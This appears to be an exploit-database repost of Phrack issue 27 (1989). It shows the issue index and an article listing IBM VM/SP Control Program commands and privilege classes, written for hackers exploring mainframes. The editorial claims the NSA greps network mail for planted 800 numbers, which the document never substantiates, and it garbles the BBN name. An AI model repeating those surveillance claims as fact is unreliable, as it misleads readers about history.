Exploit Phrack #27

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
42838
Проверка EDB
  1. Пройдено
Автор
PHRACK
Тип уязвимости
PAPERS
Платформа
MAGAZINE
CVE
N/A
Дата публикации
1989-05-20
Phrack #27
Код:
                               ==Phrack Inc.==

                     Volume Three, Issue 27, File 1 of 11

                   Phrack Inc. Newsletter Issue XXVII Index
                   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                June 20, 1989


     Greetings and welcome to Issue 27 of Phrack Inc.  The pressure is on with
SummerCon '89 just a couple short days away.  We're sorry it has taken so long
to get this issue out, but summer break has created more responsibilities and
busy schedules than we have ever had to deal with while in school.  Still, I
think you will agree that this issue was worth the wait.

     This issue we feature a new updated NUA and Datex-P list from Oberdaemon
of Switzerland and Chapter 7 of the Future Transcendent Saga (taking into
account that the SPAN and NSFnet files were chapters 5 and 6).  We also present
the second part of the COSMOS file written by King Arthur.

     Before we get to the main contents of the issue, we have a few comments to
make regarding security and Phrack Inc.'s Internet access;

     Thanks to a friend, we at Phrack Inc. have become aware of one of the main
techniques that the National Security Agency (NSA) uses to perform surveillance
on the wide area networks.

     In certain messages that certain government agencies distribute, special
phone numbers are included; WATS (800) numbers, to be more specific.  As these
messages are distributed around the continent via various netmail and file
transfer schemes, they are passed through several surveillance stations.  All
of their stations perform one function, and in Unix terms, that function is
called "grep."

     Grep stands for G>lobal R>egular E>xpression search and P>rint.  The grep
does simple string matching.  Every instance of these special 800-numbers in an
email message (or batch of them) is flagged, recorded, and the record is mailed
to certain intelligence agencies by the surveillance stations.

     Here are the networks that we are reasonably certain that this practice is
performed on:

* USEnet  : Email is only checked in certain places, but ALL netnews (including
            alt and any other nonstandard newsgroups) are flagged by a single
            government domain SUN-3 that shall remain nameless.
* ARPAnet : All mail going through a standard BBN (Bolt, Bernack, and
            Neumann... a Cambridge/MIT spinoff) Internet controller will be
            flagged, but the only information recorded by the controller is the
            source and destination TCP/IP addresses of the message.  But when
            you consider that this involves ***ALL*** DARPA mailing lists, you
            get a visualization of the magnitude.  The reason more complex
            information is NOT recorded is that this network is the only
            AUTHORIZED place that these messages with the hot WATS are supposed
            to appear.  You will see what this means in a moment.
* BITnet  : Large IBM mainframe with I/O channel cycles to spare should have no
            problem scanning mail from one of the most publically accessable
            "free" networks.
* Fidonet : The Secret Service scans this for credit card and other violations.
            It is not too hard for them to check for the (800)'s, too.
* W.Union : All international telex lines are scanned to match a whole lot of
            stuff, especially drug-related information.  The phone numbers are
            on their list.

     We have other suspicions, but we are withholding them for now.

     The other news is equally disturbing because it strikes us a little close
to home.  We are temporarily losing our network access.  As of June 27, 1989
through August 28, 1989 we will not have access to our accounts on UMCVMB
mainframe system.  Make no attempt to mail us to our addresses there until
August 28, 1989.  However, every cloud has a silver lining and this is no
exception.  For networks people who wish to submit files to Phrack Inc. during
this time period we proudly present our friend and associate, Hatchet Molly.
He can be reached at "[email protected]" and/or
"TK0GRM2%[email protected]".

     So here is to another great issue of Phrack Inc!

               Taran King                        Knight Lightning

                                 Hatchet Molly
                              [email protected]
                      TK0GRM2%[email protected]
_______________________________________________________________________________

Table of Contents:

1.  Phrack Inc. XXVII Index by Taran King and Knight Lightning
2.  Operating The IBM VM/SP CP by Taran King
3.  Introduction To MIDNET: Chapter Seven Of The FTS by Knight Lightning
4.  NUA List For Datex-P And X.25 Networks by Oberdaemon
5.  COSMOS:  COmputer System for Mainframe OperationS (Part Two) by King Arthur
6.  Looking Around In DECnet by Deep Thought
7.  The Making Of A Hacker by Framstag
8.  Sending Fakemail In Unix by Dark OverLord
9.  The Postal Inspection Service by Vendetta
10. Phrack World News XXVII/Part 1 by Knight Lightning
11. Phrack World News XXVII/Part 2 by Knight Lightning
12. Phrack World News XXVII/Part 3 by Knight Lightning
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                     Volume Three, Issue 27, File 2 of 12


                          Operating the IBM VM/SP CP

             (IBM Virtual Machine System Product Control Program)

                     An information article researched by

                                  Taran King

                                 May 18, 1989


This article is for the purpose of understanding the Control Program (CP)
portion of IBM's VM/SP.  This is basically a separate section of VM/CMS known
as CP (with full screen editors, the CP level is indicated in the lower right
hand corner of the screen and for line-by-line editors, before the command line
and after hitting carriage returns, it should say "CP") and it's purpose is to
manage real resources.  Any command that involves something outside of your
virtual machine must communicate with CP.  If CMS does not recognize a command
you give it, it will give it to CP.

The user generally enters the CP stage after a program flops or if you get
disconnected.  You can also enter the CP stage by hitting PA1 which is a
function key of sorts.  PA1 toggles between CP and CMS while on-line and if you
re-login after being disconnected, PA1 can be used besides the BEGIN command
which will be spoken about later in this article.

Generally, VM/CMS systems are well equipped with help files so if anything I
print becomes unclear to you, from CMS mode, type HELP CP XXX where XXX is the
CP command you want information on.

To start this article off, I'm printing off the IBM-Defined Class and the
Function Types as listed in the IBM VM/SP CP manual.  This essentially tells
you what privileges you have with your assigned class.

~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
IBM-Defined      Function         User &
   Class           Type          Functions
~~~~~~~~~~~      ~~~~~~~~        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     A               O           Operations:  The primary sysop can issue all
                                 class A commands.  The class A user controls
                                 the VM/SP system.  Class A is assigned to the
                                 user at the VM/SP system console during IPL.
                                 The primary sysop is responsible for the
                                 availability of the VM/SP system and its
                                 communication lines and resources.  In
                                 addition, the class A user controls system
                                 accounting, broadcast messages, virtual
                                 machine performance options, and other
                                 command operands that affect the overall
                                 performance of the VM/SP.  The sysop controls
                                 operation of the real machine using the
                                 system control panel and console device.
                                 NOTE:  The class A sysop who is automatically
                                 logged on during CP initialization is
                                 designated as the primary sysop.

     B               R           Resource:  The system resource operator can
                                 issue all class B commands.  The class B user
                                 controls allocation and deallocation of all
                                 the real resources of the VM/SP system,
                                 except those controlled by the primary sysop
                                 and spooling operator.

     C               P           Programmer:  The system programmer can issue
                                 all class C commands.  The class C user
                                 updates certain functions of the VM/SP
                                 system.  The system programmer can modify
                                 real storage in the real machine.

     D               S           Spooling:  The spooling operator can issue
                                 all class D commands.  The class D user
                                 controls spool data files and specific
                                 functions of the system's unit record
                                 equipment.

     E               A           Analyst:  The system analyst can issue all
                                 class E commands.  The class E user displays
                                 the contents of real storage, performs the
                                 functions required to generate saved systems
                                 and discontiguous saved segments, and
                                 controls the collecting and recording of
                                 performance measurement data.  This class of
                                 user can display specified real storage areas
                                 on the virtual operator's console or on a
                                 spooled virtual printer, but cannot modify
                                 real storage.

     F               C           Customer Engineer:  The service
                                 representative can issue all class F
                                 commands.  The class F user obtains, and
                                 examines, in detail, certain data about input
                                 and output devices connected to the VM/SP
                                 system.  The service representative can
                                 establish extensive recording mode for one
                                 I/O device at a time and can cause the
                                 recording of repressible machine check errors
                                 to be initiated or resumed.

     G               G           General:  The general user can issue all
                                 class G commands.  The class G user controls
                                 functions associated with the execution of
                                 his virtual machine.  A general user cannot
                                 display or modify real storage.

    ANY             ANY          The ANY classification is given to certain CP
                                 commands that are available to any user.
                                 These are primarily for the purpose of
                                 gaining and relinquishing access to the VM/SP
                                 system.

~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~

The following is the list of commands available along with a brief description
as to what they do and/or formatting and then ending with the IBM-Defined
Class and Function Type.

* : From CP, one may use the * command to annotate the terminal console sheet
~   or the terminal display screen with a comment.  In other words, type * and
then any string of characters you would, for some reason, to be present on the
screen thereafter.
Privilege Class:  ANY
Function Type:  N/A

#CP : This command is used to execute a CP Command while in a virtual machine
~~~   command environment without first signaling attention to get to the CP
command environment which means that when typing P <command> to perform a CP
operation, CP directly receives the command whereas CP <command> merely queues
the command from CP.
Privilege Class:  ANY
Function Type:  ANY

ACNT : The ACNT command is used to create accounting records for logged on
~~~~   users and to reset accounting data.  It also closes a spool file that
is accumulating accounting records.
Privilege Class:  A
Function Type:  O

ADSTOP : The ADSTOP command is used to halt the execution of a virtual machine
~~~~~~   at a virtual instruction point.  The hexloc variable may be placed
after the word ADSTOP which is a 6 character hexadecimal representation of the
virtual instruction address where the execution is to be halted.  The OFF
option of the ADSTOP command cancels any previous ADSTOP setting.
Privilege Class:  G
Function Type:  G

ATTN : Use the ATTN command to make an attention interruption pending at your
~~~~   virtual console.
Privilege Class:  G
Function Type:  G

AUTOLOG : This command allows the user to log on any virtual machine defined
~~~~~~~   in the directory.
Privilege Level:  A, B
Function Type:  O

BACKSPAC : The BACKSPAC command is used to restart or reposition the current
~~~~~~~~   output on a real punch or printer.
Privilege Class:  D
Function Type:  S

BEGIN or B : The BEGIN command by itself from CP mode will return the user to
~~~~~~~~~~   CMS mode in the place where he/she left off before he/she was
disconnected or thrown into CP.  The BEGIN command can also be followed by a
hex location as to where to start in the case of the user wanting to be doing
something other than what was previously occurring.
Privilege Class:  G
Function Type:  G

CHANGE or CH : In use of the CHANGE command, there are subcommands with
~~~~~~~~~~~~   variables.  Generally, the "name" variable is 1 to 4 characters
in length.  The following are the subcommands with functions and formatting:

  o  READER or RDR : changes reader spool files.
  o  PRINTER or PRT : changes printer spool files.
  o  PUNCH or PCH : changes punch spool files.
  o  CLASS c1 : designates an existing class where c1 is a 1-character
                alphanumerical field from A to Z or 0 to 9.
  o  spoolid : spoolid number of file that is to be changed.
  o  FORM form1 : 1 to 8 character alphanumeric form name used to select files
                  to be changed (form1).
  o  ALL : changes all of your spool files.
  o  HOLD : prevents a file from being printed, punched, or read until
            released.
  o  NOHOLD : releases the specified file from the user's HOLD status.
  o  DIST dist : changes the distribution code to variable "dist".
  o  COPY(*)nnn : specifies number of copies of the file you want spooled,
                  which is valid only for printer or punch files.  "nnn" is a
                  number from 1 to 255 and the "*" is  present in the case of
                  a 3800 printer being used so that copies will be made in the
                  printer internally.
  o  FLASH name nnn : signifies that a form's overlay contained in the 3800
                      printer is to be superimposed onto certain pages of
                      output.  "nnn" is a number from 0 to 255 representing
                      the number of copies to be superimposed.
  o  MODIFY name (n) : allows text alteration by preventing information
                       printing or by adding labels to output.  "n" selects a
                       keyword in CHARS to be used for copy modification text.
  o  CHARS name1 (name2(name3(name4)))
     CHARS name1(CH names2(CH names3(CH names4))) : specifies character
                       arrangement table when printing a file.  There can be
                       up to 4 names.
  o  FCB name : controls vertical spacing of output on a page.
  o  FORM form2 : changes spool form name of file to form2.
  o  NAME fn (ft) : assigns identification to spool file in CMS format
                    filename and filetype.
  o  NAME dsname : assigns identification to spool file in non-CMS format
                   where "dsname" is from 1 to 24 characters, suitable for
                   specifying OS or DOS files.
Privilege Class:  S, G
Function Type:  D, G

CLOSE or C : The CLOSE command terminates spooling activity on any virtual
~~~~~~~~~~   spooled unit record or console device.  It Contains the following
subcommands to be followed by the letter C or the word CLOSE:

   o  READER or RDR
   o  PRINTER or PRT
   o  PUNCH or PCH
   o  FORM form1
   o  HOLD
   o  NOHOLD
   o  DIST dist
   o  NAME fn (ft)
   o  NAME dsname
   o  vaddr : virtual address (cuu) of device to be closed.
   o  CONSOLE : closes virtual machine's console spool file which makes it a
                printer spool file.
   o  PURGE : closes and immediately purges from the virtual machine the
              output spool files.  No output file is produced.
   o  CHAIN : only valid for VM/SP HPO Release 4.2 and Profs Spool File
              Enhancement PRPQ.  Indicates that the punchfile is to be
              chained.
Privilege Class:  G
Function Type:  G

COMMANDS or COMM : Use COMMAND to list the commands and diagnose codes you are
~~~~~~~~~~~~~~~~   authorized to use.
Privilege Class:  ANY
Function Type:  ANY

COUPLE : Using the COUPLE command connects your virtual non-dedicated
~~~~~~   channel-to-channel device to another user's virtual device of the
same type or to another one of your own virtual devices of the same type.  The
format of this command is in the form of COUPLE vaddr1 TO userid vaddr2.  The
variable vaddr1 is your virtual address and the variables userid vaddr2
identify the userid and virtual address of that userid to be connected to.
Privilege Class:  G
Function Type:  G

CP : The CP command may precede the command to be processed, but it is not
~~   necessary.  Generally, the CP command is used from CMS mode to queue CP
functions by typing CP <command>.
Privilege Class:  ANY
Function Type:  ANY

CPTRAP : The CPTRAP command creates a reader file of a selected trace table,
~~~~~~   CP interface, and virtual machine interface entries for problem
determination.
Privilege Class:  C
Function Type:  P

DCP : This command displays the contents of real storage locations at the
~~~   terminal.
Privilege Class:  C, E
Function Type:  P

DEFINE or DEF : The DEFINE command in CP is used to alter your virtual machine
~~~~~~~~~~~~~   configuration or channel operating mode.  There are a LOT of
subcommands that are used with the DEFINE command such as RDR or PRT or PCH
and the list goes on and on.  If you want details, there is a help file (type
HELP CP DEF) that is almost 600 lines that goes into detail on each
subcommand.
Privilege Class:  B, G
Function Type:  R, G

DETACH or DET : The DETACH command is used to remove a virtual device from the
~~~~~~~~~~~~~   virtual machine.  The subcommands are as follows:

  o  vaddr (vaddr...) : used for multiple addresses to be detached where vaddr
                        is the virtual address (cuu) of the device to be
                        detached.
  o  vaddr-vaddr : used to detach a range of addresses.
  o  CHANNEL c : detaches the real address of the channel.
Privilege Class:  B, G
Function Type:  R, G

DIAL : Using the DIAL command logically connects a switched line, leased line,
~~~~   locally attached, or remote Binary Synchronous (BSC) terminal to a
previously logged-on multiple-access virtual machine.  It is in the format of
DIAL userid (vaddr) where the userid is that to be connected to and the
vaddr is the optional virtual address.
Privilege Class:  ANY
Function Type:  ANY

DISABLE : The DISABLE command prevents low speed communications lines from
~~~~~~~   accessing the system.
Privilege Class:  A, B
Function Type:  R

DISCONN or DISC : The DISCONNECT command is used to disconnect your terminal
~~~~~~~~~~~~~~~   from the system while the virtual machine continues
operation.  Using the DISC HOLD or DISC HO option, you specify that the
communications line is not to be disabled which allows you to avoid re-dialing
the system.
Privilege Class:  ANY
Function Type:  ANY

DISPLAY or D : The DISPLAY command allows you to display virtual machine
~~~~~~~~~~~~   components at your terminal.  Depending on what variable
follows the D or DISPLAY command from CP, you can display virtual storage
locations, storage keys, general registers, floating-point registers, control
registers, vector registers, VAC (Vector Activity Counter), VSR (Vector Status
Register), VMR (Vector Mask Register), PSW (Program Status Word), CAW (Channel
Address Word), and CSW (Channel Status Word).
Privilege Class:  G
Function Type:  G

DMCP : This command prints the contents of real storage locations on a user's
~~~~   virtual spooled printer.
Privilege Class:  C, E
Function Type:  P

DRAIN : The DRAIN command stops spooling operations on a specified real unit's
~~~~~   read devices after the file currently being processed has been
completed.
Privilege Class:  D
Function Type:  S

DUMP or DU : Use the DUMP command to print the contents of various components
~~~~~~~~~~   of the virtual machine on the virtual spooled printer.  Depending
on what variable is placed after the DUMP or DU command, the items printed
include virtual PSW (Program Status Word), general registers, floating-point
registers, control registers, storage keys, and virtual storage locations.
Privilege Class:  G
Function Type:  G

ECHO or EC : Defaulted at 1, the ECHO command places the terminal in the echo
~~~~~~~~~~   environment in which any line entered is transmitted unchanged
back to the terminal a specified number of times, depending on the variable
entered immediately after the word ECHO or EC.
Privilege Type:  G
Function Type:  G

ENABLE : Use the ENABLE command to enable the previously disabled or nonabled
~~~~~~   devices so users may access the system.
Privilege Class:  A, B
Function Type:  R

EXTERNAL or EXT : The EXTERNAL command allows the user to simulate an external
~~~~~~~~~~~~~~~   interrupt to the virtual machine and to return control to
that machine.  The hexadecimal code following the word EXTERNAL or EXT is
associated with the external interrupt, the default being the number 40 which
is associated with the external interrupt button on a system console.
Privilege Class:  G
Function Type:  G

FLUSH : The FLUSH command halts and immediately purges on hold the current
~~~~~   output on a specified unit record device.
Privilege Class:  D
Function Type:  S

FORCE : This command forces a logoff of any user of the system.
~~~~~
Privilege Class:  A
Function Type:  O

FREE : Use the FREE command to remove a set of spool files belonging to a
~~~~   specified user from a system hold status.
Privilege Class:  D
Function Type:  S

HALT : The HALT command terminates any active channel program on a specified
~~~~   real device.
Privilege Class:  A
Function Type:  O

HOLD : The HOLD command places user spool files in a system hold status.
~~~~
Privilege Class:  D
Function Type:  S

INDICATE or IND : At your terminal, you can display the use of and contention
~~~~~~~~~~~~~~~   for major system resources with the INDICATE command.  The
following variables that follow the word INDICATE or IND show the following
data:

  o  LOAD : shows number of users in queue 1 and queue 2, the usage of real
            storage, and the ratio of active users to users being serviced.
            This is done by returning values that indicate operating load on
            the system.
  o  USER : displays the amounts of system resources used by your virtual
            machine in the current terminal session.
Privilege Class:  A, E, G
Function Type:  O, A, G

IPL or I : Generally used to return to CMS via the IPL CMS  or I CMS command,
~~~~~~~~   the IPL command simulates an initial program load function for a
virtual machine.  Subcommands are as follows:

  o  vaddr : virtual address (cuu) of the device that contains the nucleus to
             be loaded.
  o  cylno : cylinder containing the IPL data which defaults to 0.
  o  nnnnn : block address containing the IPL data which defaults to 0.
  o  CLEAR : sets virtual storage space to binary zeros before the operating
             system is loaded.
  o  NOCLEAR : allows contents of your virtual storage space to remain
               unchanged prior to program load.
  o  STOP : halts the virtual machine during the IPL procedure just before the
            initial PSW is loaded.
  o  ATTN : generates an attention interrupt to the virtual machine during the
            IPL procedure.
  o  PARM p1 (p2...) : processes up to 64 bytes of data to your virtual
                       machine's general registers starting with the high
                       order byte of general register 0.
  o  systemname : simulates IPL function when loading a named system that was
                  previously saved.
Privilege Class:  G
Function Type:  G

LINK : The LINK command is used to make a device that is associated with
~~~~   another virtual machine available at your virtual machine configuration
based upon info in that user's directory entry.  This command is in the format
of LINK TO userid vaddr1 AS vaddr2 (mode) ((PASS=) password(1)).
Privilege Class:  G
Function Type:  G

LOADBUF : On a 1403 printer, the LOADBUF command loads the Universal Character
~~~~~~~   Set (UCS) with a specified print train or chain image.  On a
3203, 3211, 3212, 4245, or 4248 printer, it loads the UCS or the Forms Control
Buffer (FCB) with a specified image.  On a 3289 Model 4 printer, it loads the
Font Offset Buffer (FOB) with the image print belt and the FCB.
Privilege Class:  D
Function Type:  S

LOADVFCB : This command specifies the forms control buffer image for different
~~~~~~~~   virtual spooled printers.  The variables that follow it include:

  o  vaddr
  o  FCB : required reserved keyword meaning Forms Control Buffer.
  o  name : a name that is system defined.
  o  INDEX (nn) : place initial printing position in number nn for the 3211
                  printer.
Privilege Class:  G
Function Type:  G

LOCATE : Use the LOCATE command to find the addresses of CP control blocks
~~~~~~   associated with a particular user, a user's device, or a real system
device.
Privilege Class:  C, E
Function Type:  P

LOCK : This command permanently locks in selected pages of real storage.
~~~~
Privilege Class:  A
Function Type:  O

LOGOFF or LOGOUT or LOG : Used to terminate a virtual machine session and
~~~~~~~~~~~~~~~~~~~~~~~   disconnect your virtual machine from the system,
this command can be used with the HOLD option (i.e.  LOG HOLD) for retaining
the connection allowing for a switched communications line to enable one to
log on without re-dialing the system.
Privilege Class:  ANY
Function Type:  ANY

LOGON or LOGIN or L : Obvious enough, the LOGIN or LOGON command is used to
~~~~~~~~~~~~~~~~~~~   identify yourself to the system and to access that
system.  Following the words LOGIN or LOGON or L, type your userid which is
the identifier assigned to you in the system.  If the system you are logging
onto does NOT have password suppression, your password can follow directly
after your userid.  NOTE:  If the system you are on does have password
suppression (i.e.  it does not echo to your screen what you type when you type
your password), you will get a system error message if you try to put it on
the same line as your userid.  The NOIPL option, which would follow your
password and userid, specifies that the IPL device or name in the directory
should not be used for an automatic IPL.
Privilege Class:  ANY
Function Type:  ANY

MESSAGE or MSG or M : Use the MESSAGE command to transmit message text to a
~~~~~~~~~~~~~~~~~~~   specified userid or to the primary system operator
userid.  MSG userid msgtext sends msgtext to the userid specified after
userid. If userid is replaced with *, the text is sent to yourself.  Also, if
the userid is replaced with OPERATOR, the message text is sent to the primary
system operator regardless of his userid.
Privilege Class:  A, B, ANY
Function Type:  O, ANY

MIGRATE : The MIGRATE command activates the normal page/swap table migration
~~~~~~~   routines or forces a particular user's pages to a secondary device
even if that user is currently active.
Privilege Class:  A
Function Type:  O

MONITOR : To initiate or override the system-generated function or to
~~~~~~~   terminate the recording of events occurring in the real machine, use
the MONITOR command.
Privilege Class:  A, E
Function Type:  O

MSGNOH : The MSGNOH command allows a service virtual machine to send messages
~~~~~~   to specified users without the standard header associated with the
MESSAGE command.
Privilege Class:  B
Function Type:  R

NETWORK : The NETWORK command allows you to load, dump and control operation
~~~~~~~   of a 3704 or 3705 and to control operation of a 3725 control program
operating in 270x emulation mode (EP).  Also, it allows control of remote 3270
devices via binary synchronous lines.
Privilege Class:  A
Function Type:  O

NOTREADY or NOTR : Using the NOTREADY command causes the virtual device, which
~~~~~~~~~~~~~~~~   is specified after the NOTREADY statement via cuu address,
to appear as if it had changed from ready to not ready status.
Privilege Class:  G
Function Type:  G

ORDER or ORD : ORDER is used to place your closed spool files in a specific
~~~~~~~~~~~~   order by device type.  These spool files include READER,
PRINTER, and PUNCH files and can be sorted by CLASS, FORM, and spoolid.
Privilege Class:  D, G
Function Type:  S, G

PER : PER allows one to monitor certain events as they occur during program
~~~   execution in the user's virtual machine.  This command can monitor the
fetching and execution of an instruction, the execution of a successful branch
instruction, the instruction of an instruction that alters a specific general
purpose register, and the execution of an instruction in the virtual machine
that alters storage.
Privilege Class:  A, B, C, D, E, F, G
Function Type:  G

PURGE or PUR : Use the PURGE command to remove your own closed spool files
~~~~~~~~~~~~   from the system before they are printed or punched by the
spooling devices, or before they are read by a user.  The spool file
specifications include READER, PRINTER, and PUNCH files as well as the ALL
option which purges all of the above mentioned files.
Privilege Class:  D, G
Function Type:  S, G

QUERY or Q : Also available in CMS mode, the QUERY command is used to
~~~~~~~~~~   determine your system status and machine configuration.
Although there are far too many subcommands of the QUERY command, the
following is a list of items that may be queried.  I recommend, for full
detail, using the HELP CP QUERY command as it is quite thorough (over 1000
lines) in explaining the QUERY command.

  o  The time you have used during a terminal session.
  o  The number of closed input and output spool files associated with
     your virtual machine.
  o  The current settings of the color and/or extended highlight values
     in effect for your virtual machine console.
  o  The current settings of the SET command functions.
  o  The current settings of the TERMINAL command functions.
  o  The status of all the devices on your virtual machine.
  o  The channel operating mode of your virtual machine, whether
     block-multiplexer or selector.
  o  A listing of all users who are linked to a given virtual address,
     together with their device addresses and access modes.
  o  Display of the secondary user (secuser) that is specified in the
     CONSOLE directory statement.
  o  Identification and attributes associated with your virtual
     PRINTER, PUNCH, and READER spool files.
  o  The identification of your virtual processor.
  o  The mode of processor operation of your VM/SP HPO installation:
     uniprocessor mode (UP), attached processor mode (AP), or
     multiprocessor mode (MP).
  o  The userid and system identifier.
  o  A listing of the PER traceset elements.
  o  The log messages of the day.
  o  The names of the users that are logged on.
  o  The number of users that are logged on or dialed to the system.

NOTE:  There are other operands you can use with the QUERY command if you
       have the privilege class required to use them.
Privilege Class:  A, B, C, D, E, F, G
Function Type:  O, R, P, S, A, C, G

QVM : Use this command to request the transition from the VM/SP environment to
~~~   native mode for a particular virtual machine.
Privilege Class:  A
Function Type:  O

READY : In the format of READY vaddr, this command is used to set a device-end
~~~~~   interruption pending for the specified virtual device.
Privilege Class:  G
Function Type:  G

REPEAT : Use the REPEAT command to increase the number of copies of an output
~~~~~~   file or to place the current output file in a hold status increasing
or not increasing the number of copies to be created.
Privilege Class:  D
Function Type:  S

REQUEST or REQ : Simply use the REQUEST command to make an attention interrupt
~~~~~~~~~~~~~~   at your virtual console.
Privilege Class:  G
Function Type:  G

RESET : Also in the format of RESET vaddr, this command is used to clear all
~~~~~   pending interrupts from the specified virtual device.
Privilege Class:  G
Function Type:  G

REWIND or REW : The REWIND command is used to rewind a real tape unit attached
~~~~~~~~~~~~~   to your virtual machine at a specified virtual device address
in the format REWIND vaddr.
Privilege Class:  G
Function Type:  G

SAVESYS : This command allows you to save a virtual machine storage space with
~~~~~~~   registers and the PSW as they currently exist.  It is used in the
process of creating named systems.
Privilege Class:  E
Function Type:  A

SCREEN or SCRE : Use the SCREEN command to alter or change any extended color
~~~~~~~~~~~~~~   and/or extended highlight definitions for your virtual
machine console.  You may issue the command from any IBM supported terminal or
from a PROFILE EXEC because the SCREEN command is not device dependent.
However, the SCREEN command is only valid when the Extended Color Feature has
been applied to the terminal controller.

You can assign extended color and extended highlighting values to six distinct
display screen areas:  the input area, the system status area, and the output
area that encompasses three other areas: CP output, virtual machine output,
virtual machine output, and an input redisplay area.  The physical attributes
of 3270 Information Display station screens vary according to model.

Because this command mainly applies to people who are not on dial-up, I have
elected not to detail all of the variables available with the SCREEN command.
Once again, I recommend you using HELP CP SCREEN for details.
Privilege Class:  G
Function Type:  G

SEND : Using the Single Console Image Facility, the SEND command is used to
~~~~   pass commands and message replies for the secondary user's console to
disconnect virtual machines for execution.  This command is executed in the
format:  SEND (CP) userid (text).
Privilege Class:  G
Function Type:  G

SET : Use the SET command to control various functions within your virtual
~~~   system.  This command has a large number of variables that can be SET
and details for each of the variables can be obtained from the HELP CP SET
file.
Privilege Class:  A, B, E, F, G
Function Type:  O, R, A, C, G

SHUTDOWN : This command, of course, systematically ends all virtual machine
~~~~~~~~   functions and checkpoints the system for an eventual warn start.
Privilege Class:  A
Function Type:  O

SLEEP or SL : To place the virtual machine in a dormant state but allow
~~~~~~~~~~~   messages to be displayed, use the SLEEP command in the format
of SLEEP nn (time-specification) where time-specification is SEC for seconds,
MIN for minutes, or HR for hours and nn is the number of the amount of time
for the machine to be in dormant state.
Privilege Class:  G
Function Type:  G

SMSG or SM : The SMSG command is used to send a special message to a virtual
~~~~~~~~~~   machine programmed to accept and process the message.  The format
of this command is SMSG userid msgtext where userid is the userid to receive
the message and msgtext is the message to be sent to the userid.
Privilege Class:  G
Function Type:  G

SPACE : Use the SPACE command to force the output on a specified printer to be
~~~~~   single spaced for the current active spool file regardless of the
carriage control commands in the actual file.
Privilege Class:  D
Function Type:  S

SPMODE : SPMODE allows the system operator to establish or reset the single
~~~~~~   processor mode environment.
Privilege Class:  A
Function Type:  O

SPOOL or SP : Use the SPOOL command to modify the spooling control options in
~~~~~~~~~~~   effect for a given virtual spooling device or for a group of
devices.  The SPOOL command can also start or stop the spooling of virtual
console input and output.  You can direct a file to a remote location by using
the SPOOL command in conjunction with the TAG command.
Privilege Class:  G
Function Type:  G

SPTAPE : Use this command to dump spool files to tape or to load spool files
~~~~~~   from tape.
Privilege Class:  D
Function Type:  S

START : The START command restarts a spooling device after it has been drained
~~~~~   or changes the output class that it may service.
Privilege Class:  D
Function Type:  S

STCP : To alter the contents of real storage but not real PSW or real
~~~~   registers, use the STCP command.
Privilege Class:  C
Function Type:  P

STORE or ST : The STORE command is used to alter the contents of specified
~~~~~~~~~~~   registers and locations of the virtual machine.  As well as
saving virtual machine data in low storage, the contents of the following can
be altered:

  o  Virtual storage locations
  o  General registers
  o  Floating-point registers
  o  Control registers
  o  Program Status Word (PSW)
Privilege Class:  G
Function Type:  G

SYSTEM or SYS : SYSTEM is used to simulate the action of the RESET and RESTART
~~~~~~~~~~~~~   buttons on the real computer console, and to clear storage.
The variables are as follows:

  o  CLEAR : clears virtual storage and virtual storage keys to binary zeros.
  o  RESET : clears all pending interrupts and conditions in the virtual
             machine.
  o  RESTART : simulates the hardware system RESTART function by storing the
               current PSW at virtual location eight and loading, as the new
               PSW, the doubleword from virtual location zero.
Privilege Class:  G
Function Type:  G

TAG or TA : The TAG has many different variables that can be tagged, which are
~~~~~~~~~   too many to list here because of different settings for each one,
but it is used to associate file descriptive information with a spool file.
Privilege Class:  G
Function Type:  G

TERMINAL or TERM : The TERMINAL command is used to control the following
~~~~~~~~~~~~~~~~   functions associated with your virtual console:

  o  Logical line-editing symbols
  o  Masking of password
  o  The APL character set
  o  The Text character set
  o  Signaling of an attention interrupt
  o  Attention handling mode for your virtual console
  o  Line length for output on your virtual console
  o  Specifying terminal device type as 3101 or TTY
  o  Location of cursor preceding terminal read
  o  Scrolling rate for 3101 terminal
Privilege Class:  G
Function Type:  G

TRACE or TR : Use the TRACE command to trace specified virtual machine
~~~~~~~~~~~   activity and to record the results at the terminal, on a virtual
spooled printer, or on both terminal and printer.  If you issue more than one
TRACE command, the operands are cumulative; that is, operands specified for the
first time are activated, whereas those specified with new modifiers are
updated.  The RUN and NORUN operands, however, can be specified in different
tracing functions and do not cause a conflict.

You cannot issue the TRACE command while preferred machine assist is
operating, whether or not you have enabled the preferred machine assist
feature's control switch assist.
Privilege Class:  G
Function Type:  G

TRANSFER or TRAN : This command is used to transfer your closed spool files to
~~~~~~~~~~~~~~~~   a specified user or queue, or to reclaim closed spool files
that you created.
Privilege Class:  D, G
Function Type:  S, G

UNLOCK : Use the UNLOCK command to unlock page frames previously locked by a
~~~~~~   LOCK command.
Privilege Class:  A
Function Type:  O

VARY : The VARY command marks a device available or unavailable for use by a
~~~~   user or the control program.
Privilege Class:  B
Function Type:  R

VMDUMP or VMD : The VMDUMP command dumps virtual storage that VM/SP HPO
~~~~~~~~~~~~~   creates for the virtual machine user.  VMDUMP dumps the
following:

  o  Virtual Program Status Word (PSW)
  o  General registers
  o  Floating-point registers
  o  Control registers
  o  Storage protection keys
  o  Virtual machine type identification
  o  Timer values
Privilege Class:  G
Function Type:  G

WARNING : Use the WARNING command to transmit high-priority messages to a
~~~~~~~   specified user or to all users.
Privilege Class:  A, B
Function Type:  O

~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
This article is far from totally complete as far as in-depthness goes.  As I
have stated in numerous portions of this file, the VM/CMS system has a very
good HELP file system, and from CMS, the command HELP CP <command> will, in
most cases, allow you to read a relatively clear text file containing the
details and usage specifications of these commands.  I hope that, should you be
moving around a VM/CMS system, this file will assist you in the CP mode.

